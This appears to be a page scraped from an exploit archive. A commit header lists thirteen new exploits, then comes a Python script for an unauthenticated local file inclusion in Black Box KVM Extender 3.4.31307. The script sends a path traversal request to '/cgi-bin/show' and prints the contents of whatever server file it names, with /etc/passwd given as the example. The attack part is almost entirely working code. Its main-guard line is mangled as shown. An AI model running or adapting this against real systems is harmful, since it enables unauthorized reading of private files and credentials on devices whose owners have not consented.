1514ca02a7
13 changes to exploits/shellcodes Huawei dg8045 - Authentication Bypass WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS) Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated) Black Box Kvm Extender 3.4.31307 - Local File Inclusion Pallets Werkzeug 0.15.4 - Path Traversal Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated) Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi) Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution
23 lines
No EOL
824 B
Python
Executable file
23 lines
No EOL
824 B
Python
Executable file
# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion
|
|
# Date: 05.07.2021
|
|
# Exploit Author: Ferhat Çil
|
|
# Vendor Homepage: http://www.blackbox.com/
|
|
# Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm
|
|
# Version: 3.4.31307
|
|
# Category: Webapps
|
|
# Tested on: Linux
|
|
# Description: Any user can read files from the server
|
|
# without authentication due to an existing LFI in the following path:
|
|
# http://target//cgi-bin/show?page=FilePath
|
|
|
|
import requests
|
|
import sys
|
|
|
|
if name == 'main':
|
|
if len(sys.argv) == 3:
|
|
url = sys.argv[1]
|
|
payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2]
|
|
r = requests.get(payload)
|
|
print(r.text)
|
|
else:
|
|
print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd') |